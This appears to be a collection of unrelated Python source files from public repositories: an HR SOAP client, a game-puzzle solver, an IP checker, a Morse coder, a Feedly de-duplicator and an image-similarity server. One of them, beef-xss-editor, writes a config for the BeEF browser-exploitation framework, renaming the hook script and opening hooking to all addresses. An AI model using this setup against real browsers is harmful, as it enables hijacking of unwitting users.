"UserName": self.username,
"Password": <PASSWORD>,
"ClientAccessKey": self.client_access_key,
"UserAccessKey": self.user_access_key,
}
endpoint = "LoginService"
# Log in and get session token
zeep_client = ZeepClient(f"{self.base_url}{endpoint}")
result = zeep_client.service.Authenticate(_soapheaders=login_header)
self.token = result["Token"]
# Create xsd ComplexType header - http://docs.python-zeep.org/en/master/headers.html
header = xsd.ComplexType(
[
xsd.Element(
"{http://www.ultimatesoftware.com/foundation/authentication/ultiprotoken}UltiProToken",
xsd.String(),
),
xsd.Element(
"{http://www.ultimatesoftware.com/foundation/authentication/clientaccesskey}ClientAccessKey",
xsd.String(),
),
]
)
# Add authenticated header to client object
self.session_header = header(
UltiProToken=self.token, ClientAccessKey=self.client_access_key
)
return True
def find_people(self, query):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
response = zeep_client.service.FindPeople(
_soapheaders=[self.session_header], query=query
)
return response["Results"]
def get_person_by_employee_number(self, employee_number):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
element = zeep_client.get_element("ns6:EmployeeNumberIdentifier")
obj = element(EmployeeNumber=employee_number)
response = zeep_client.service.GetPersonByEmployeeIdentifier(
_soapheaders=[self.session_header], employeeIdentifier=obj
)
return response["Results"]
def get_person_by_email_address(self, email_address):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
element = zeep_client.get_element("ns6:EmailAddressIdentifier")
obj = element(EmailAddress=email_address)
response = zeep_client.service.GetPersonByEmployeeIdentifier(
_soapheaders=[self.session_header], employeeIdentifier=obj
)
return response["Results"]
def update_person(self, person):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
response = zeep_client.service.UpdatePerson(
_soapheaders=[self.session_header], entities=person
)
return response["Results"]
def log_on_with_token(self):
# print(inspect.getmembers(client))
credentials = {"Token": self.token, "ClientAccessKey": self.client_access_key}
# Log on to get ns5:DataContext object with auth
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
element = zeep_client.get_element("ns5:LogOnWithTokenRequest")
obj = element(**credentials)
# print(inspect.getmembers(obj))
return zeep_client.service.LogOnWithToken(obj)
def get_report_list(self, context):
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
return zeep_client.service.GetReportList(context)
def get_report_path_by_name(self, context, report_name):
report_list = self.get_report_list(context)
return list(
filter(lambda x: x["ReportName"] == report_name, report_list.Reports.Report)
)[0]["ReportPath"]
def get_report_parameters(self, report_path, context):
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
return zeep_client.service.GetReportParameters(report_path, context)
def execute_report(self, context, report_path, delimiter=","):
session = requests.Session()
session.headers.update({"US-DELIMITER": delimiter})
transport = Transport(session=session)
payload = {"ReportPath": report_path}
zeep_client = ZeepClient(
f"{self.base_url}{'BiDataService'}", transport=transport
)
element = zeep_client.get_element("ns5:ReportRequest")
obj = element(**payload)
r = zeep_client.service.ExecuteReport(request=obj, context=context)
return r["ReportKey"]
def execute_and_retrieve_report(self, report_name, delimiter=","):
context = self.log_on_with_token()
report_path = self.get_report_path_by_name(context, report_name)
k = self.execute_report(context, report_path, delimiter=delimiter)
r = self.retrieve_report(k)
report = r["body"]["ReportStream"].decode("unicode-escape").split("\r\n")
csvreader = csv.reader(report)
headers = next(csvreader)
output = []
for row in csvreader:
if len(row) > 0:
output.append(
dict(
map(
lambda rowitem: (headers[rowitem], row[rowitem]),
range(len(row)),
)
)
)
return output
def retrieve_report(self, report_key):
zeep_client = ZeepClient(f"{self.base_url}{'BiStreamingService'}")
return zeep_client.service.RetrieveReport(
_soapheaders={"ReportKey": report_key}
)
``` |
{
"source": "0xwhoami/growtopia-chemsynth-router",
"score": 2
} |
#### File: 0xwhoami/growtopia-chemsynth-router/chemrouter.py
```python
import argparse
import sys
# import tool required
from route.route import route
from route.execute import execute
from chemsynth.chemsynth import Chemsynth, ChemsynthException
from chemsynth.chempoint import ChemsynthPoint, ChemsynthPointException
# =========
# Interface
# =========
def prepare(to_do_list):
'''
this function will format to_do_list so it will be do_list. format means remove repeating same function
on same index sequentially and append the count of it to the to do_list
'''
# prepare
f_idx, idx = to_do_list[0]
x = 1
do_list = []
# formatting to_do_list
for i in range(1, len(to_do_list)):
f_idx2, idx2 = to_do_list[i]
if f_idx == f_idx2 and idx == idx2:
x += 1
continue
do_list.append([f_idx, idx, x])
f_idx = f_idx2
idx = idx2
x = 1
do_list.append([f_idx, idx, x])
# return do_list
return do_list
def percentage(dom, tar):
'''
return percentage of equality
'''
value = ChemsynthPoint._ChemsynthPoint__point1(dom, tar)
length = len(dom)
value = int((value / length) * 100)
return value
def print_step(dom, tar, do_list, advance=False):
# list of tool name sorted based on index of function in execute.py
func_name = ["\"Centrifuge\"", "\"Stirrer\"", "\"Catalyst\"", "\"Replicator\""]
# prepare
chem = Chemsynth(dom)
tar = tar.upper()
step = 1
# table header
print("{step:^5} {tool:^12} {block:^12} {times:^12} {complete:^12}".format(step='STEP', tool='TOOL', block='BLOCK', times='TIMES', complete='COMPLETE'))
for f_idx, idx, x in do_list:
# get old chemsynth tank
temp = str(chem)
# executing as many as x
for y in range(x):
execute(chem, [[f_idx, idx]])
# print the step and the content
print("{step:<5} {tool:^12} {block:^12} {times:^12} {complete:^12}".format(step='#'+str(step), tool=func_name[f_idx], block=idx+1, times=x, complete=str(percentage(chem.dom, tar))+'%'))
# if advance == True, print with tank state
if advance == True:
print(temp, "->", chem)
step += 1
def get_parser():
'''
preparing for argument parser
'''
parser = argparse.ArgumentParser(prog='Chemsynth Router', description='Chemsynth Router by whoami and mrx', add_help=False)
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--doc', action='store_const', const=1, default=0, dest='doc', help='documentation about Chemsynth Router')
group.add_argument('-h', '--help', action='store_const', const=1, default=0, dest='help', help='show this help message')
group.add_argument('-q', '--quit', action='store_const', const=1, default=0, dest='quit', help='quit from program')
group.add_argument('-r', '--route', action="extend", nargs=2, help='route based on DOMAIN and TARGET, [COLOR] can be R, Y, G, B, P', metavar='[COLOR]', dest='route')
parser.add_argument('-a', '--advance', action='store_const', const=1, default=0, dest='advance', help='show step with realtime Chemsynth Tank color state, optionally with -r/--route')
group.add_argument('-v', '--version', action='store_const', const=1, default=0, dest='version', help='show program version')
return parser
def arg_check(Namespace):
'''
optional argument specified more than one in one line
'''
if Namespace.doc + Namespace.version + Namespace.quit + Namespace.help + Namespace.advance > 1:
raise ArgumentError
if Namespace.advance == 1 and not(any([Namespace.doc, Namespace.version, Namespace.quit, Namespace.help, Namespace.route])):
raise ArgumentError
def welcome():
print("Chemsynth Router [Version 2.0] by whoami and mrx\n"
"type -h or --help for more informations\n")
def doc():
print("Chemsynth Router v 2.0 is an open source program written in Python 3\n"
"created by whoami and mrx\n"
"source available at https://github.com/0xwhoami/Growtopia-Chemsynth-Router\n")
def help(parser):
parser.print_help()
def quit():
raise SystemExit2
def version():
print("Chemsynth Router 2.0")
# =====
# Error
# =====
class SystemExit2(Exception): pass
class ArgumentError(Exception): pass
# =====
# Start
# =====
welcome()
# get parser for argument
parser = get_parser()
while True:
try:
to_do_list = []
result = parser.parse_args(input(">>> ").split())
# checking argument
arg_check(result)
if result.doc:
doc()
elif result.help:
help(parser)
elif result.quit:
quit()
elif result.version:
version()
elif result.route:
# get domain and target
dom = result.route[0]
tar = result.route[1]
# routing
to_do_list = route(dom, tar)
# we can't route
if to_do_list == []:
print("sorry we can't route, it's the maximum we can do :(")
continue
do_list = prepare(to_do_list)
# print route step by step
print_step(dom, tar, do_list, result.advance)
except (ChemsynthException, ChemsynthPointException) as e:
print("error:", e)
except (ArgumentError, EOFError, KeyboardInterrupt):
help(parser)
except SystemExit2:
sys.exit(0)
except SystemExit:
pass
except:
# logging
log = open('log.txt', 'a')
print("error:", sys.exc_info()[:2], '\n',
"arg:", result,
file=log, end='\n\n')
log.close()
raise
```
#### File: growtopia-chemsynth-router/chemsynth/chemsynth.py
```python
from random import randint
from helper.helper_func import find
__all__ = ['Chemsynth',
'ChemsynthException'
]
# ======
# Colors
# ======
RED = 0
YELLOW = 1
GREEN = 2
BLUE = 3
PINK = 4
# ===================
# Chemsynth Exception
# ===================
class ChemsynthException(Exception): pass
class UnspecifiedColor(ChemsynthException): pass
class UnidentifiedColor(ChemsynthException): pass
# =============================
# Utility functions and classes
# =============================
class Chemsynth:
'''
This class provides all the tools Chemsynth needs
'''
# ============
# Class Member
# ============
__slots__ = ('_dom')
_virtual = ('dom')
# list of expected input color string
color_table = ('R', 'Y', 'G', 'B', 'P')
# ========================
# Class Building Functions
# ========================
def __init__(self, dom):
# validating input color
self.__color_validation(dom)
# initialization
self._dom = list(dom.upper().strip())
# encode color
self._encode_color(self._dom)
def __eq__(self, other):
return self._dom == other._dom
def __len__(self):
return len(self._dom)
def __repr__(self):
return repr(self._dom)
def __str__(self):
temp = self._dom.copy()
self._decode_color(temp)
return "[" + "|".join(temp) + "]"
def __getattr__(self, name):
'''
fetching a virtual attribute, virtual attribute is used
when fecthing an attribute in _virtual to make a new
instance
'''
if name in self._virtual:
temp = object.__getattribute__(self, '_' + name).copy()
self._decode_color(temp)
return ''.join(temp)
raise AttributeError("%s object has no attribute %s" %(self.__class__.__name__, name))
@staticmethod
def _encode_color(dom):
'''
encode color to index based on Chemsynth.color_table
'R' -> RED
'Y' -> YELLOW
'G' -> GREEN
'B' -> BLUE
'P' -> PINK
'''
for index in range(len(dom)):
dom[index] = find(Chemsynth.color_table, dom[index])
@staticmethod
def _decode_color(dom):
'''
decode index to color based on Chemsynth.color_table
RED -> 'R'
YELLOW -> 'Y'
GREEN -> 'G'
BLUE -> 'B'
PINK -> 'P'
'''
for index in range(len(dom)):
dom[index] = Chemsynth.color_table[dom[index]]
# ================
# Interface Helper
# ================
@staticmethod
def __color_validation(color_string):
'''
validating input color based on Chemsynth.color_table
'''
# prepare
temp = color_string.upper().strip()
# test for empty color
if temp == "":
raise UnspecifiedColor("color not specified")
# test for unidentified color
for index in range(len(temp)):
if not(temp[index] in Chemsynth.color_table):
raise UnidentifiedColor("unidentified color: '%s'" % (color_string[index]))
@staticmethod
def __centrifuge_far(length, index):
'''
produce a maximum block distance that can be affected by a centrifuge
'''
mid = length >> 1 # length // 2
max_value = (mid) - ((length & 1)^1) # length % 2 == length & 1
# calculating
# upper than mid
if index > mid:
return max_value - index + mid
# mid
elif index == mid:
return max_value
# lower than mid
return index
@staticmethod
def __catalyst_range(tank, index):
'''
produce a maximum block range that can be affected by a catalyst
'''
start, end = index, index
# calculating start index
while start-1 > -1 and tank[start-1] == tank[index]:
start -= 1
# calculating end index
while end+1 < len(tank) and tank[end+1] == tank[index]:
end += 1
return (start, end+1)
# =========
# Interface
# =========
def solvent(self, index):
'''
Use on a highlighted Chemsynth Tank to dissolve it,
shifting chemicals left to fill in the gap. A random
chemical is added in the rightmost tank.
'''
# shifting block to the left
for i in range(1, len(self._dom)):
self._dom[i-1] = self._dom[i]
# random color in rightmost tank
self._dom[len(self._dom)-1] = randint(RED, PINK)
def replicator(self, index):
'''
Use on a highlighted Chemsynth Tank to duplicate its
content, pushing all chemicals to the right to make
room.
'''
# shifting block to the right start at index till len-1 but doing from right
for i in range(len(self._dom)-1, index, -1):
self._dom[i] = self._dom[i-1]
def catalyst(self, index):
'''
Use on a highlighted Chemsynth Tank to shift its color
upward on the spectrum (Red, Yellow, Green, Blue,
Pink, Red). This also affects all touching tanks of the
same color.
'''
# get range start from x, end at y (excluding y)
start, after_end = self.__catalyst_range(self._dom, index)
# change color to the next color
self._dom[index] = (self._dom[index] + 1) % len(Chemsynth.color_table)
# side effect of catalyst, affect all the same color before color changed
for i in range(start, after_end):
self._dom[i] = self._dom[index]
def stirrer(self, index):
'''
Use on a highlighted Chemsynth Tank to swap the
chemicals on either side of it with each other. The
selected tank is unaffected.
'''
# out of range mitigation
if not(index == 0 or index == len(self._dom)-1):
# swap color
self._dom[index-1], self._dom[index+1] = self._dom[index+1], self._dom[index-1]
def centrifuge(self, index):
'''
Use on a highlighted Chemsynth Tank to rotate
chemicals around it. Rotates as many from the right
as it can to match how many are to the left of the
selected tank.
'''
# get the maximum distance that can be reached by centrifuge
range_plus_or_minus = self.__centrifuge_far(len(self._dom), index)
# swap color
for x in range(1, range_plus_or_minus+1):
self._dom[index-x], self._dom[index+x] = self._dom[index+x], self._dom[index-x]
```
#### File: growtopia-chemsynth-router/route/point_based.py
```python
from chemsynth.chempoint import ChemsynthPoint
from helper.helper_func import find
# relative import
from .execute import execute
from .execute import CENTRIFUGE, STIRRER, CATALYST, REPLICATOR
__all__ = ['point_route']
# ascending order based on value CENTRIFUGE, STIRRER, CATALYST, REPLICATOR
_func_point = (ChemsynthPoint.centrifuge_point, ChemsynthPoint.stirrer_point, ChemsynthPoint.catalyst_point,
ChemsynthPoint.replicator_point)
def _bruteforce(chem, func):
'''
return list of point from func
'''
# prepare
temp = [0]*len(chem._dom)
# get list of point from bruteforcing with func on each item
for index in range(len(chem._dom)):
temp[index] = func(chem, index)
# return list of point
return temp
def _best_route(chem):
'''
get the best route from list of list of point from function in ChemsynthPoint
'''
# there are four function, each of them will be bruteforced to get list of point
ways = [[],[],[],[]]
max_value = 0
max_index = 0
func_index = 0
# start to get list of point
for i in (CENTRIFUGE, STIRRER, CATALYST, REPLICATOR):
# get list of point from _func_point[i]
ways[i] = _bruteforce(chem, _func_point[i])
# calculating the best route
if max(ways[i]) > max_value:
max_value = max(ways[i])
max_index = find(ways[i],max(ways[i]))
func_index = i
# return function-index, index of item, and it's point
return (func_index, max_index, max_value)
def point_route(chem):
'''
return to_do_list which is list of function's index and item's index.
WARNING chem modified
'''
# prepare
to_do_list = []
# while domain color != target color
while chem._dom != chem._tar:
# getting function's index, item's index, and it's point
func_index, index, point = _best_route(chem)
# point <= 0 means, bad if we continuing to do it, so just break
if point <= 0:
break
# execute chem with specified function's index and item's index
execute(chem, [[func_index, index]])
# append step to to_do_list
to_do_list.append((func_index, index))
# return to_do_list
return to_do_list
``` |
{
"source": "0xWTC/check-your-ip-address-and-location",
"score": 3
} |
#### File: 0xWTC/check-your-ip-address-and-location/check.py
```python
import logging
import requests
import json
import time
from multiprocessing import Pool
def pool_worker(id):
Checker(id).main()
def ip_pooler(checks, threads):
ids = []
for _ in range(checks): # number of checks to run
ids.append(_)
p = Pool(threads) # number of simultaneous checks
p.map(pool_worker, ids)
class Checker:
"""Check your IP addresses and other parameters on https://wtfismyip.com"""
def __init__(self, name):
self.name = name
self.logging_init()
def logging_init(self):
"""Start the logging library at level = DEBUG. You can switch to level = ERROR when you're finished with development."""
logging.basicConfig(filename = "./logging.log", level = logging.DEBUG)
self.logger = logging.getLogger()
def time_start(self):
self.time_start = time.time()
def time_end(self):
time_stop = time.time()
self.dt = time_stop - self.time_start
return round(self.dt, 2)
def check_ip(self):
try:
request_data = requests.get('http://wtfismyip.com/json')
except Exception as e:
self.logger.error(e)
raise
json_data = json.loads(request_data.text)
ip = json_data['YourFuckingIPAddress']
hostname = json_data['YourFuckingHostname']
location = json_data['YourFuckingLocation']
isp = json_data['YourFuckingISP']
return (
f"Checker id: {self.name}\n"
f"IP: {ip}\n"
f"Hostname: {hostname}\n"
f"Location: {location}\n"
f"ISP: {isp}"
)
def main(self):
self.time_start()
print(self.check_ip())
time_end = {self.time_end()}
print(f"It took {time_end} seconds to look up this data.\n")
self.logger.info(f"Process: {self.name}. {time_end} seconds runtime.")
if __name__ == "__main__":
"""This will run if this script is executed directly and NOT imported into another script"""
print("Welcome to the IP checker!\n")
Checker(666).main()
#ip_pooler(checks=10, threads=2) # uncomment this to try multithreading
``` |
{
"source": "0xYa5h/Python-Thunder",
"score": 3
} |
#### File: 0xYa5h/Python-Thunder/forEncodeMorse.py
```python
mcode = { 'A':'.-', 'B':'-...',
'C':'-.-.', 'D':'-..', 'E':'.',
'F':'..-.', 'G':'--.', 'H':'....',
'I':'..', 'J':'.---', 'K':'-.-',
'L':'.-..', 'M':'--', 'N':'-.',
'O':'---', 'P':'.--.', 'Q':'--.-',
'R':'.-.', 'S':'...', 'T':'-',
'U':'..-', 'V':'...-', 'W':'.--',
'X':'-..-', 'Y':'-.--', 'Z':'--..',
'1':'.----', '2':'..---', '3':'...--',
'4':'....-', '5':'.....', '6':'-....',
'7':'--...', '8':'---..', '9':'----.',
'0':'-----', ', ':'--..--', '.':'.-.-.-',
'?':'..--..', '/':'-..-.', '-':'-....-',
'(':'-.--.', ')':'-.--.-'}
def encrypt(message):
cipher = ''
for letter in message:
if letter != ' ':
cipher += mcode[letter] + ' '
else:
cipher += ' '
return cipher
def decrypt(message):
message += ' '
decipher = ''
citext = ''
for letter in message:
if (letter != ' '):
i = 0
citext += letter
else:
i += 1
if i == 2 :
decipher += ' '
else:
decipher += list(mcode.keys())[list(mcode.values()).index(citext)]
citext = ''
return decipher
def process():
n = int(input("enter 1 for encryption 0 for decryption "))
if n == 1:
enc_message = raw_input("Enter a message to encrypt ")
result = encrypt(enc_message.upper())
print (result)
else:
dec_message = raw_input("Enter encrypted message to decrypt ")
result = decrypt(dec_message)
print (result)
process()
``` |
{
"source": "0xYasser/rssOptimizer",
"score": 3
} |
#### File: rssOptimizer/src/feedly_helper.py
```python
import config
import requests
import json
import jellyfish
import re
FEEDLY_URI = "http://cloud.feedly.com"
mark_read = []
marked_count = 0
def get_subscriptions():
# reutrn subscriptions of the user
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/subscriptions'
url = FEEDLY_URI + uri
subscriptions = requests.get(url=url, headers=headers).json()
return subscriptions
def get_unread_entries_in_category(ids):
# id: category id
# return unred items for a given category
unread = []
MAX_ENTRIES = 10000 # max number of entry ids to return based on feedly doc
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
for i in range(len(ids)):
uri = '/v3/streams/ids?streamId='+ids[i]+'&count='+str(MAX_ENTRIES)+'&unreadOnly=true'
url = FEEDLY_URI + uri
unread.append(requests.get(url=url, headers=headers).json())
return unread
def get_categories():
# reutrn a list of the ids of the user categories
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/categories'
url = FEEDLY_URI + uri
categories = requests.get(url=url, headers=headers).json()
data = []
for i in range(len(categories)):
if(categories[i]['label'] != 'Must Read'):
data.append(categories[i]['id'])
return data
def delete_category(id):
# id: category id
# delete the given category id from feedly
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/categories/' + id
url = FEEDLY_URI + uri
response = requests.delete(url=url, headers=headers).json()
return response
def get_entry_contents(id):
#id: entry ids list
# return a list of the titles of all entries
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/entries/.mget'
url = FEEDLY_URI + uri
contents = requests.post(url=url, headers=headers, json=id).json()
return contents
def clean_content(data):
# data: list of all the content
# return a dictunary with {id:{title:url}}
clean_data = []
for i in range(len(data)):
single = [""] * 3
single[0] = data[i]['id']
single[1] = data[i]['title']
single[2] = data[i]['alternate'][0]['href']
clean_data.append(single)
return clean_data
def check_similarity(data1, data2):
# data1, data2 two lists size 2
# return bool based on title score using jaro scoring algorithm or = urls
title_score = jellyfish.jaro_winkler(data1[1].lower(),data2[1].lower()) * 100
#if title_score > 80:
# print('\n',data1[1].lower(),'--' ,data2[1].lower(),':',title_score)
rx = re.compile(r'[^(http:/|https:/)].*$')
t1 = rx.findall(data1[2].lower())[0]
t2 = rx.findall(data2[2].lower())[0]
url_score = (t1 == t2)
if( url_score or title_score > 85):
return True
return False
def get_duplicates_content(data):
# data: content
# return dict of the duplicates
similar = False
dub_id = []
added = []
for i in range(len(data)):
for j in range(len(data)):
if(i != j):
similar = check_similarity(data[i],data[j])
if (similar and data[j][0] not in dub_id and data[i][0] not in dub_id):
#print(data[j][1],"\n ",data[i][1],"\n ",data[j][2],"\n ",data[i][2])
dub_id.append(data[j][0])
return dub_id
def mark_read(body_data):
# data: list of ids to mark read
# return a dictunary with {id:{title:url}}
count = len(body_data)
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret, 'Content-type': 'application/json'}
uri = '/v3/markers'
url = FEEDLY_URI + uri
body = create_read_body(body_data)
contents = requests.post(url=url, headers=headers, data=json.dumps(body))
result = "The request returned \"{}\", and {} marked read".format(contents.reason, count)
return result
def create_read_body(data):
# data: list of ids to mark read
# return a JSON format with the feedly body
body = {}
body['action'] = 'markAsRead'
body['type'] = 'entries'
body['entryIds'] = data
return body
def work():
category = get_categories()
unread = get_unread_entries_in_category(category)
contents = get_entry_contents(unread)
clean = clean_content(contents)
dubs = get_duplicates_content(clean)
mark = mark_read(dubs)
print(mark)
work()
```
#### File: rssOptimizer/src/rssOptimizer.py
```python
import config
import opml
import feedparser
def opml_url_parser():
# return a dictionary (title,url)
opmlFile = config.RSSOPT_CONFIG['OPML_LOCATION']
feeds = dict()
rss = opml.parse(opmlFile)
for i in range(0,len(rss)):
for j in range(0,len(rss[i])):
feeds[rss[i][j].title] = rss[i][j].xmlUrl
return feeds
``` |
{
"source": "0xyg3n/beef-xss-editor",
"score": 2
} |
#### File: 0xyg3n/beef-xss-editor/beef-xss-editor.py
```python
import os
import getpass
import time
import shutil
#Coded by 0xyg3n
#Trying to make your life easier with this.
def banner():
os.system('clear')
print """
___ ____ ____ ____ _ _ ____ ____ ____ ___ _ ___ ____ ____
|__] |___ |___ |___ __ \/ [__ [__ __ |___ | \ | | | | |__/
|__] |___ |___ | _/\_ ___] ___] |___ |__/ | | |__| | \ ver 1.0
Coded By 0xyg3n
"""
def config():
banner()
ipathbeef=raw_input(' Please Specify Beef-Xss Path (Default /usr/share/beef-xss/): ')
print ''
fhost=raw_input(" [i]Host: ")
print ''
fport=raw_input(" [i]Port: ")
print ''
hookname=raw_input(" [i]Hook.js Rename: ")
print ''
ui=raw_input(" [i]Panel: ")
print ''
buser=raw_input(" [i]Beef Username: ")
print ''
bpasswd=getpass.getpass(" [i]Beef Password: ")
os.system('clear')
banner()
print '''
+==============================================+
[i]Host: '''+fhost+'''\n
[i]Port: '''+fport+'''\n
[i]HookJS: '''+hookname+'''\n
[i]Panel: '''+ui+'''\n
[i]Beef Username: '''+buser+'''\n
[i]Beef PassWord: ******
+==============================================+
'''
time.sleep(4)
data='''
#
# Copyright (c) 2006-2016 <NAME> - <EMAIL>
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.7.0-alpha'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "'''+fhost+'''"
port: "'''+fport+'''"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
#public: "" # public hostname/IP address
#public_port: "" # experimental
# DNS
dns_host: "localhost"
dns_port: 53
# Web Admin user interface URI
web_ui_basepath: "/'''+ui+'''"
# Hook
hook_file: "/'''+hookname+'''.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "<PASSWORD>"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
user: "'''+buser+'''"
passwd: "'''+<PASSWORD>+'''"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
extension:
requester:
enable: true
proxy:
enable: true
key: "beef_key.pem"
cert: "beef_cert.pem"
metasploit:
enable: false
social_engineering:
enable: true
evasion:
enable: false
ipec:
enable: true
# this is still experimental..
dns:
enable: false
# this is still experimental..
dns_rebinding:
enable: false
'''
print ''
print '[*]Writing Out Current Settings Into config.yaml..\n'
conf = open('config.yaml', "w")
conf.write(data)
conf.close()
time.sleep(3)
print '[*]Moving To Beef Directory..\n'
wfilew='config.yaml'
os.system ("mv"+ " " + wfilew + " " + ipathbeef)
time.sleep(3)
print '[*]Done.\n'
exit()
config()
``` |
{
"source": "0xYG3NIUM/testapp",
"score": 2
} |
#### File: 0xYG3NIUM/testapp/server.py
```python
from os import listdir
from os.path import isfile, join
import traceback
import json
import uuid
import re
import tempfile
from flask import Flask, request
import wand.image
import wand.display
import wand.exceptions
app = Flask(__name__)
global str
#local stuff
from img import persisted_img
im = persisted_img()
BANK_PATH = "static\\img\\bank"
BANK_THUMB_PATH = join(BANK_PATH,'thumb')
print ('USING BANK PATH ' + BANK_PATH)
print ('USING THUMB PATH ' + BANK_THUMB_PATH)
def get_images(path):
#this isn't very robust, oh well
return filter(
lambda x : re.search('\.(jpg|jpeg|png)', x.lower()) != None,
[join(path, f) for f in listdir(path) if isfile(join(path,f))]
)
def get_bank_images():
return get_images(BANK_PATH)
def get_thumb_images():
return get_images(BANK_THUMB_PATH)
@app.route("/")
def index():
return '''
<html>
<head>
</head>
<body>
<div id="content"></div>
<script type="text/javascript" src="/static/js/all.js"></script>
</body>
</html>
'''
@app.route('/similar', methods=['POST'])
def similar():
if request.method == 'POST':
file = request.files['file']
if file:
tmpfile = join(
tempfile.gettempdir(),
file.name
)
file.save(tmpfile)
#lol shitty
try:
with wand.image.Image(filename=tmpfile) as img:
img.resize(256, 256)
img.save(filename=tmpfile)
matches = im.match(tmpfile, limit=10)
return json.dumps(matches)
except:
traceback.print_exc()
pass
return '', 400
@app.route('/bank', methods=['GET', 'POST'])
def bank():
if request.method == 'POST':
file = request.files['file']
print (file)
if file:
tmpfile = join(
tempfile.gettempdir(),
file.name
)
guid = str(uuid.uuid4().hex.upper()[0:12]) + '.jpg'
dstfile = join(
BANK_PATH,
guid
)
dstfile_thumb = join(
BANK_THUMB_PATH,
guid
)
file.save(tmpfile)
try:
with wand.image.Image(filename=tmpfile) as img:
img.save(filename=dstfile)
#will potentially produce some funny results with extremely wide/oblong images
img.resize(256, 256)
img.save(filename=dstfile_thumb)
im.add_image(dstfile_thumb)
except wand.exceptions.MissingDelegateError:
return 'input is not a valid image', 500
return '', 200
elif request.method == 'GET':
limit = 10
try:
limit = int(request.args.get('limit', '10'))
except ValueError:
pass
#note, will spit back any non dir
files = list(get_bank_images())
return json.dumps({
'count' : im.get_count(),
'latest' : ['/'+f for f in files[0:limit]]
})
return '', 400
if __name__ == "__main__":
#todo: toggle debug from config
app.debug = True
app.run()
``` |
{
"source": "0xYoan/python_cherrytree",
"score": 3
} |
#### File: python_cherrytree/tests/test_python_cherrytree.py
```python
